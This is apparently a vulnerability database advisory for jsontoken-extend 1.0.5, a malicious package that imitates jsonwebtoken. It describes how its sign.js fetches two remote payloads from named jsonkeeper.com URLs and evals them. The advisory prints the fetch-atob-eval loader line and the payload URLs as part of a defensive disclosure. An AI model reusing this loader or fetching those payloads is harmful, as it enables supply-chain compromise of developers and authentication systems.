VDB
GCVE-110-OSM-2026-1362
GCVE-110-OSM-2026-1362
Advisory PublishedCVSS 9.6/10
Executes two independent remote second-stage payloads fetched from attacker-controlled domain www.jsonkeeper.com (https://www.jsonkeeper.com/b/2NZOS and https://www.jsonkeeper.com/b/UPBF0) via fetch + eval injected at lines 65 and 83 of sign.js. Masquerades as jsonwebtoken — the malicious eval fires during every JWT signing operation, targeting authentication-critical codepaths.
sign.js stores two base64-encoded C2 URLs (HS_STRING, TOKEN_STRING). At lines 65 and 83 the module calls fetch(atob(HS_STRING/TOKEN_STRING)).then(r=>r.json()).then(d=>{eval(codeString);}) — two remote JS payloads are fetched and eval'd. Injected into a 9.7 KB copy of the legitimate jsonwebtoken sign.js. Uses same fetch-eval pattern as campaign siblings path-extend and path-internal.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | jsontoken-extend | 1.0.5 (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.